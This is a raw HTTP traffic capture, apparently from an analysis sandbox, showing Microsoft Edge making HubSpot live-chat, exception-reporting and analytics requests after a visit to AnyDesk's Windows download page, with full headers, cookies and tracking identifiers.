report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mdOOPxLEiL7%2B%2FzGfxBdGIod0O45Tn1rBLXnjhGhHVIiZir3p21W%2BOxthoinwbo09s6%2Bf3jMQIlnHdZDBVLcy2ZWrinbtG2jolX%2F9Io7S2TYPsqfJdqluudyWYLTpLx36gCjs"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=aFC3UIoVk676tnMGZpM7IaXP8IlipgqvKpHnVcJ7uPE-1728144508998-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
GET

https://api.hubspot.com/livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=3b5dfcf8035541a9b4520f1e214bc1fb&traceId=3b5dfcf8035541a9b4520f1e214bc1fb&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.3.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /livechat-public/v1/message/public?portalId=7940397&conversations-embed=static-1.18177&mobile=false&messagesUtk=3b5dfcf8035541a9b4520f1e214bc1fb&traceId=3b5dfcf8035541a9b4520f1e214bc1fb&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f&__hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&__hssc=261462610.3.1728144483689&referrer=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fwindows HTTP/2.0
host: api.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
sec-ch-ua-mobile: ?0
x-hubspot-messages-uri: https://anydesk.com/en/downloads/thank-you?dv=win_exe
accept: */*
origin: https://anydesk.com
sec-fetch-site: cross-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:31 GMT
content-type: application/json;charset=utf-8
content-length: 1499
cf-ray: 8cdeabb96b1e0bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://anydesk.com
cache-control: no-cache, no-store, no-transform, must-revalidate, max-age=0
content-encoding: gzip
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent, X-HubSpot-Messages-Uri
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
x-content-type-options: nosniff
x-hubspot-correlation-id: b617e552-11fa-47c5-a31f-e213b285471e
set-cookie: __cf_bm=SHyRnrXKPcLsOjdUoRlIJG7KNX3fZoaF2l1x_GrVMyo-1728144511-1.0.1.1-F75ji7iKtUu3FUCMe8waBsnNi464rpOolyivw6Wjw3PQJHSmmkCvdpZGiucjFVF9RHoUlWih_tIw2x4oSdXwDw; path=/; expires=Sat, 05-Oct-24 16:38:31 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6pAdnQrYMedxWQPr6dO7OgVqYlKGZHgQQDaGadwI78Zmpikhb3yecYQyrjl%2FIk4uGaB5GNiIzrkMVW5BM1peARvjJNLfyJf7KcrEgSHRqFSlOCU4algAvmN65sDB8tjDfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=ZyfxV23eN28Qu2VGh0fDU_MkJGUHBzSNB5RLLyMD48k-1728144511261-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
GET

https://app.hubspot.com/conversations-visitor/7940397/threads/utk/3b5dfcf8035541a9b4520f1e214bc1fb?uuid=c0c99db6ece044748b1127f977c80f5d&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=3b5dfcf8035541a9b4520f1e214bc1fb&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /conversations-visitor/7940397/threads/utk/3b5dfcf8035541a9b4520f1e214bc1fb?uuid=c0c99db6ece044748b1127f977c80f5d&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=3b5dfcf8035541a9b4520f1e214bc1fb&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f HTTP/2.0
host: app.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
upgrade-insecure-requests: 1
dnt: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://anydesk.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:32 GMT
content-type: text/html; charset=utf-8
cf-ray: 8cdeabbfcbae0bad-AMS
cf-cache-status: DYNAMIC
age: 2289
cache-control: max-age=600
content-encoding: gzip
etag: W/"92cfcc4f73d45a74e3aa5782ce9dc842"
last-modified: Tue, 01 Oct 2024 19:53:43 UTC
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
via: 1.1 f57a09c5455a80253c61001d750462e6.cloudfront.net (CloudFront)
access-control-allow-credentials: false
cache-tag: staticjsapp-conversations-visitor-ui-web-prod,staticjsapp-prod
content-security-policy-report-only: script-src 'self' www.hubspot.com *.hsappstatic.net *.hs-analytics.net *.hs-banner.com *.hsforms.net *.hsleadflows.net *.hs-scripts.com *.hubspotfeedback.com *.usemessages.com js.hubspot.com *.hsadspixel.net *.hscollectedforms.net js-agent.newrelic.com bam.nr-data.net bam-cell.nr-data.net *.google-analytics.com www.googletagmanager.com data: 'unsafe-inline' 'unsafe-eval' blob: connect.facebook.net www.gstatic.cn www.gstatic.com www.google.com www.recaptcha.net *.fullstory.com fullstory.com apis.google.com snap.licdn.com; report-uri https://send.hsbrowserreports.com/csp/report?resource=conversations-visitor-ui/static-1.20626/html/index.html&cfRay=8cdeabbfcbae0bad&reqUrl=https%3A%2F%2Fapp.hubspot.com%2Fconversations-visitor%2F7940397%2Fthreads%2Futk%2F3b5dfcf8035541a9b4520f1e214bc1fb%3Fuuid%3Dc0c99db6ece044748b1127f977c80f5d%26mobile%3Dfalse%26mobileSafari%3Dfalse%26hideWelcomeMessage%3Dfalse%26hstc%3D261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1%26domain%3Danydesk.com%26inApp53%3Dfalse%26messagesUtk%3D3b5dfcf8035541a9b4520f1e214bc1fb%26url%3Dhttps%253A%252F%252Fanydesk.com%252Fen%252Fdownloads%252Fthank-you%253Fdv%253Dwin_exe%26inline%3Dfalse%26isFullscreen%3Dfalse%26globalCookieOptOut%3D%26isFirstVisitorSession%3Dtrue%26isAttachmentDisabled%3Dfalse%26isInitialInputFocusDisabled%3Dfalse%26enableWidgetCookieBanner%3Dfalse%26isInCMS%3Dfalse%26hideScrollToButton%3Dtrue%26isIOSMobile%3Dfalse%26hubspotUtk%3Da5b3d1933284be27e3a7527fad5a6a3f&referrer=https%3A%2F%2Fanydesk.com%2F&cfenv=prod&pdt=2024-10-05&csp=ro
report-to: {"group":"default","max_age":86400,"endpoints":[{"url":"https://send.hsbrowserreports.com/csp/reports"}]}
reporting-endpoints: default="https://send.hsbrowserreports.com/csp/reports?cfRay=8cdeabbfcbae0bad&resource=conversations-visitor-ui/static-1.20626/html/index.html"
x-amz-cf-id: sn1azrLmsbfOQ_9dkfMks-N-JgrT3S_DU0WFz8ytG3ndaa8D4019og==
x-amz-cf-pop: IAD12-P3
x-amz-replication-status: COMPLETED
x-amz-server-side-encryption: AES256
x-amz-version-id: hVkVcK8l8m_IHBKUGh9hahU3mPpZRmCl
x-cache: Hit from cloudfront
x-content-type-options: no-sniff
x-envoy-upstream-service-time: 7
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-served-by-pod: iad02/app-td/envoy-proxy-6c6dd6864-w6dph
x-evy-trace-virtual-host: all
x-hs-cache-status: MISS
x-hs-target-asset: conversations-visitor-ui/static-1.20626/html/index.html
x-hs-worker-debug-mode: false
x-hubspot-correlation-id: d2ea6a64-3f82-4b90-9cee-c0926b9e4fa5
x-request-id: d2ea6a64-3f82-4b90-9cee-c0926b9e4fa5
set-cookie: __cf_bm=wA.CMr0FwaeaqOdv3CoRaToHss7Z5JlNKKByfHksAds-1728144512-1.0.1.1-7phGO0f3EgE0dq7ltI9Xlcn_a1VyvQjf51QFDqVoIHTw8oMNkSPh9cfhc3Q.TreX46qUnAOoNYlI_GuiA3DQpg; path=/; expires=Sat, 05-Oct-24 16:38:32 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
set-cookie: _cfuvid=DN_5CkCi.s9V9KYMK0A6_Br84A2xpjf0bS_pUaQzjac-1728144512138-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
POST

https://exceptions.hubspot.com/api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true HTTP/2.0
host: exceptions.hubspot.com
content-length: 2385
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:34 GMT
content-type: text/plain; charset=utf-8
content-length: 0
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Accept-Charset, Accept-Encoding, X-Override-Internal-Permissions, X-Properties-Source, X-Properties-SourceId, X-Properties-Flag, X-Hubspot-User-Id, X-Hubspot-Trace, X-Hubspot-Callee, X-Hubspot-Offset, X-Hubspot-No-Trace, X-HubSpot-Static-App-Info, X-HubSpot-Messages-Uri, X-HubSpot-Request-Source, X-HubSpot-Request-Reason, Subscription-Billing-Auth-Token, X-App-CSRF, X-Tools-CSRF, Online-Payment-Signing-UUID, X-Source, X-SourceId, X-Origin-UserId, X-Biden-Request-Source, X-HubSpot-CSRF-hubspotapi, X-Force-Cookie-Refresh, X-Force-Cookie-Refresh-No-Cache, X-HS-User-Request, X-Application-Id, X-HS-Referer, X-HubSpot-Correlation-Id
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, X-HS-User-Request, Link, Server-Timing
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
vary: origin
x-content-type-options: nosniff
x-envoy-upstream-service-time: 15
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: e9567319-df65-4f41-8b70-c97c89b87cb9
x-evy-trace-served-by-pod: iad02/exceptions-td/envoy-proxy-5f776d69d8-hkrfs
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: e9567319-df65-4f41-8b70-c97c89b87cb9
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=KOs_NXIbz.Y10OIdQ0afjqgfjGhEftFA3TKbviaZgRQ-1728144514-1.0.1.1-7bH18JA5mptBzqdlqIQGJXa_nAWLt30HbNYyO4y9LTi3WNPv15dH5kI0g.GzxL9_H1RF0sJFTy_AK9Uome.cow; path=/; expires=Sat, 05-Oct-24 16:38:34 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pkH1s9mz7WGNIhlbRkJVgI%2Fp9qi8RtvaIT9kkRY%2BLLzum8cZszSooPDTicycbFuvJx%2BxZUHMiMBqzgOldbZ1IwiLdB4fkOPB%2B4cOJ8EUH7bf6EPMbApAlyyTp0D8zXoBmi%2B8fV%2FEZJM%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=sRynCEmbYECHYuiuo8B607oQRPHQjTVZn._tyqbQg4I-1728144514771-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeabd08a190bad-AMS
POST

https://exceptions.hubspot.com/api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/1/store/?sentry_version=7&sentry_client=raven-js%2F3.19.1&sentry_key=7ab6425e7a7c4b01b71fdb51e76514bf&isPageEvent=true HTTP/2.0
host: exceptions.hubspot.com
content-length: 2082
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:34 GMT
content-type: text/plain; charset=utf-8
content-length: 0
access-control-allow-origin: https://app.hubspot.com
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Accept-Charset, Accept-Encoding, X-Override-Internal-Permissions, X-Properties-Source, X-Properties-SourceId, X-Properties-Flag, X-Hubspot-User-Id, X-Hubspot-Trace, X-Hubspot-Callee, X-Hubspot-Offset, X-Hubspot-No-Trace, X-HubSpot-Static-App-Info, X-HubSpot-Messages-Uri, X-HubSpot-Request-Source, X-HubSpot-Request-Reason, Subscription-Billing-Auth-Token, X-App-CSRF, X-Tools-CSRF, Online-Payment-Signing-UUID, X-Source, X-SourceId, X-Origin-UserId, X-Biden-Request-Source, X-HubSpot-CSRF-hubspotapi, X-Force-Cookie-Refresh, X-Force-Cookie-Refresh-No-Cache, X-HS-User-Request, X-Application-Id, X-HS-Referer, X-HubSpot-Correlation-Id
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, X-HS-User-Request, Link, Server-Timing
access-control-allow-credentials: true
access-control-max-age: 604800
timing-allow-origin: *
vary: origin
x-content-type-options: nosniff
x-envoy-upstream-service-time: 14
x-evy-trace-route-service-name: envoyset-translator
x-evy-trace-virtual-host: all
x-hubspot-correlation-id: 03ce5a68-08f3-4da0-a18c-33f3d5b28d5f
x-evy-trace-served-by-pod: iad02/exceptions-td/envoy-proxy-5f776d69d8-xkbgf
x-evy-trace-listener: listener_https
x-evy-trace-route-configuration: listener_https/all
x-request-id: 03ce5a68-08f3-4da0-a18c-33f3d5b28d5f
cf-cache-status: DYNAMIC
set-cookie: __cf_bm=nMu.DTbN.UYyvfbVunosGQ2PT7es8Jb5Rqc9SJ0Ba20-1728144514-1.0.1.1-TJOevBDLuOrWW0xCd6ufxs2t77foYVLVRshZIB1hBzSDzBRYc6YjqS5kXKb_O1cac9dl6.bB4_IKs.qG0YWM_A; path=/; expires=Sat, 05-Oct-24 16:38:34 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WSRvyR3mgiYEGD9DA07ppva4hbpPBckiVVWjAiN%2BmgnpAXDeaRefs57eYH9THPMVRGUF0oWN7UeyvSwJP5qbTgJDZCuckZyc1Q9L4yoIfnTPGRfqKn3b37lGSdeFRcddHfwhgHaF9Ks%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
strict-transport-security: max-age=31536000; includeSubDomains; preload
set-cookie: _cfuvid=d3_3M.owDsPnx7XtyCkCoRJyhsAgfTIA7OGAjqFSrZM-1728144514780-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
cf-ray: 8cdeabd08a1d0bad-AMS
POST

https://app.hubspot.com/api/cartographer/v1/rhumb?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/cartographer/v1/rhumb?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626 HTTP/2.0
host: app.hubspot.com
content-length: 407
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/conversations-visitor/7940397/threads/utk/3b5dfcf8035541a9b4520f1e214bc1fb?uuid=c0c99db6ece044748b1127f977c80f5d&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=3b5dfcf8035541a9b4520f1e214bc1fb&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 204

date: Sat, 05 Oct 2024 16:08:34 GMT
cf-ray: 8cdeabd0aa520bad-AMS
cf-cache-status: DYNAMIC
access-control-allow-origin: https://app.hubspot.com
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: true
access-control-allow-headers: Authorization, authorization, Origin, origin, X-Requested-With, x-requested-with, Content-Type, content-type, Accept, accept, Accept-Charset, accept-charset, Accept-Encoding, accept-encoding, X-Override-Internal-Permissions, x-override-internal-permissions, X-Properties-Source, x-properties-source, X-Properties-SourceId, x-properties-sourceid, X-Properties-Flag, x-properties-flag, X-Hubspot-User-Id, x-hubspot-user-id, X-Hubspot-Trace, x-hubspot-trace, X-Hubspot-Callee, x-hubspot-callee, X-Hubspot-Offset, x-hubspot-offset, X-Hubspot-No-Trace, x-hubspot-no-trace, X-HubSpot-Static-App-Info, x-hubspot-static-app-info, X-HubSpot-Messages-Uri, x-hubspot-messages-uri, X-HubSpot-Request-Source, x-hubspot-request-source, X-HubSpot-Request-Reason, x-hubspot-request-reason, Subscription-Billing-Auth-Token, subscription-billing-auth-token, X-App-CSRF, x-app-csrf, X-Tools-CSRF, x-tools-csrf, Online-Payment-Signing-UUID, online-payment-signing-uuid, X-Source, x-source, X-SourceId, x-sourceid, X-Origin-UserId, x-origin-userid, X-Biden-Request-Source, x-biden-request-source, X-HubSpot-CSRF-hubspotapi, x-hubspot-csrf-hubspotapi, X-Force-Cookie-Refresh, x-force-cookie-refresh, X-Force-Cookie-Refresh-No-Cache, x-force-cookie-refresh-no-cache, X-HS-User-Request, x-hs-user-request, X-Application-Id, x-application-id, X-HS-Referer, x-hs-referer, X-HubSpot-Dpl-Correlation-Group-Id, x-hubspot-dpl-correlation-group-id, X-HubSpot-Dpl-Parent-Log-Id, x-hubspot-dpl-parent-log-id, X-HS-InfraIdp-Engaged, x-hs-infraidp-engaged, traceparent, X-HsOpenTelemetry-Head-Sampling-Strategy, x-hsopentelemetry-head-sampling-strategy, x-hs-fingerprint
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
access-control-expose-headers: x-last-modified-timestamp, X-HubSpot-NotFound, x-hubspot-notfound, X-HS-User-Request, x-hs-user-request, Link, link, Server-Timing, server-timing, X-Hubspot-Correct-Hublet, x-hubspot-correct-hublet, X-HubSpot-Auth-Failure, x-hubspot-auth-failure
access-control-max-age: 604800
server-timing: hcid;desc=aaa89a33-1edc-4531-8e3d-8eafaa377143
timing-allow-origin: *
x-content-type-options: nosniff
x-hubspot-correlation-id: aaa89a33-1edc-4531-8e3d-8eafaa377143
set-cookie: __cf_bm=z8zN7GutThzRkUSgFSyT0Pejtk3eOZJBXHHkDOseYL4-1728144514-1.0.1.1-TP1yDnEfT.kyJ8rBSv0F9E_pLnlJQaqhHoT.YKaEVAjG7KwARRfy6MpOPhajcDF.17uW3s9JJN6..0IzvYpYOw; path=/; expires=Sat, 05-Oct-24 16:38:34 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FG4RIev%2BY%2BfljcqxKq5tyNGI95HuYEmJRwKnqT0tZD4QZzEkvkRkIdZZJVDjTeUVljF5hoOYUcU99gyRWGnms9CYr1g02BzHMELKGye7WVasYUaewZqkeaFAL8cttE6yoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=KpZjDIpJsIzlgjXVmuazkdGbV0T33cqVjPEMqX9qvHU-1728144514782-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
GET

https://app.hubspot.com/api/livechat-public/v1/bots/public/bot/2029034/welcomeMessages?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626&conversations-visitor-ui=static-1.20626&traceId=3b5dfcf8035541a9b4520f1e214bc1fb&sessionId=AMOaWbKAjfMJdhPltlchK6OaLIvf5w1BgqCg9_4ykQTHihhNvKBjD8dwq7KjRMDr4km9CuzL93gtwWEh4vhnaNFYtF965lkPx0WMlxUXxnPB5F3H1FAuvpbAk1dSOI1m9uzQoNzoKX60QPB9eAYi1v7uqXnhq2u-0EWln2IS4yPnN1ILyd7U-EQ&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f

msedge.exe

Remote address:

104.16.117.116:443

Request

GET /api/livechat-public/v1/bots/public/bot/2029034/welcomeMessages?hs_static_app=conversations-visitor-ui&hs_static_app_version=1.20626&conversations-visitor-ui=static-1.20626&traceId=3b5dfcf8035541a9b4520f1e214bc1fb&sessionId=AMOaWbKAjfMJdhPltlchK6OaLIvf5w1BgqCg9_4ykQTHihhNvKBjD8dwq7KjRMDr4km9CuzL93gtwWEh4vhnaNFYtF965lkPx0WMlxUXxnPB5F3H1FAuvpbAk1dSOI1m9uzQoNzoKX60QPB9eAYi1v7uqXnhq2u-0EWln2IS4yPnN1ILyd7U-EQ&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f HTTP/2.0
host: app.hubspot.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
accept: application/json, text/javascript, */*; q=0.01
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://app.hubspot.com/conversations-visitor/7940397/threads/utk/3b5dfcf8035541a9b4520f1e214bc1fb?uuid=c0c99db6ece044748b1127f977c80f5d&mobile=false&mobileSafari=false&hideWelcomeMessage=false&hstc=261462610.a5b3d1933284be27e3a7527fad5a6a3f.1728144483688.1728144483688.1728144483688.1&domain=anydesk.com&inApp53=false&messagesUtk=3b5dfcf8035541a9b4520f1e214bc1fb&url=https%3A%2F%2Fanydesk.com%2Fen%2Fdownloads%2Fthank-you%3Fdv%3Dwin_exe&inline=false&isFullscreen=false&globalCookieOptOut=&isFirstVisitorSession=true&isAttachmentDisabled=false&isInitialInputFocusDisabled=false&enableWidgetCookieBanner=false&isInCMS=false&hideScrollToButton=true&isIOSMobile=false&hubspotUtk=a5b3d1933284be27e3a7527fad5a6a3f
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

date: Sat, 05 Oct 2024 16:08:34 GMT
content-type: application/json;charset=utf-8
content-length: 528
cf-ray: 8cdeabd0ba660bad-AMS
cf-cache-status: DYNAMIC
content-encoding: gzip
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: origin, Accept-Encoding
access-control-allow-credentials: false
access-control-allow-headers: Accept, Accept-Charset, Accept-Encoding, Accept-Language, Content-Type, Host, Origin, Referer, User-Agent, X-HubSpot-Messages-Uri
access-control-allow-methods: GET, OPTIONS, PUT, POST, DELETE, PATCH, HEAD
server-timing: hcid;desc=8f4c808d-5125-4643-9fc7-5ff70106eeb7
x-content-type-options: nosniff
x-hubspot-correlation-id: 8f4c808d-5125-4643-9fc7-5ff70106eeb7
set-cookie: __cf_bm=WvbwtrjZxb6bxZf0lC4AOm0dyVxk1o0wC7nkohqAPVo-1728144514-1.0.1.1-PI1Vt4G2aBnW_3TQtVcLdqWU0oenHjIE2rhSVY9afkKdUMPH4PfASdikkkucHziMJh9ojn2QEj00VqcKnHA1Og; path=/; expires=Sat, 05-Oct-24 16:38:34 GMT; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2NVI%2FTtaYG9KwQhyge1mIycdEhaJNn8AdweiS62b0RE4Opmq9bTHYUx1u17JwPHrT5b%2BQo6T7qKaBS3NY6armarNhUTABVc51AnLtWJ6LEcZLIdkx%2FC7XJ7TFJKWZVTaOw%3D%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
set-cookie: _cfuvid=aUW_41hRwMAvv.IWilVNE6wD2OfP6iGe8yn951nOeRY-1728144514834-0.0.1.1-604800000; path=/; domain=.hubspot.com; HttpOnly; Secure; SameSite=None
server: cloudflare
POST

https://app.hubspot.com/api/cartographer/v1/ipl

msedge.exe

Remote address:

104.16.117.116:443

Request

POST /api/cartographer/v1/ipl HTTP/2.0
host: app.hubspot.com
content-length: 3160
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
content-type: text/plain;charset=UTF-8
accept: */*
origin: https://app.hubspot.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
